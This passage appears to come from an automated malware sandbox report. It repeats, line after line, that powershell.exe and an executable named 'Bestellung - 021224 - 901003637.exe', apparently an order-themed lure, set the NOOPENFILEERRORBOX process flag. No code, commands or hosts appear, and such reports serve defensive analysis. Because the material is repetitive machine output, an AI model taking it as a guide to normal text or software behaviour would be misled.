                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
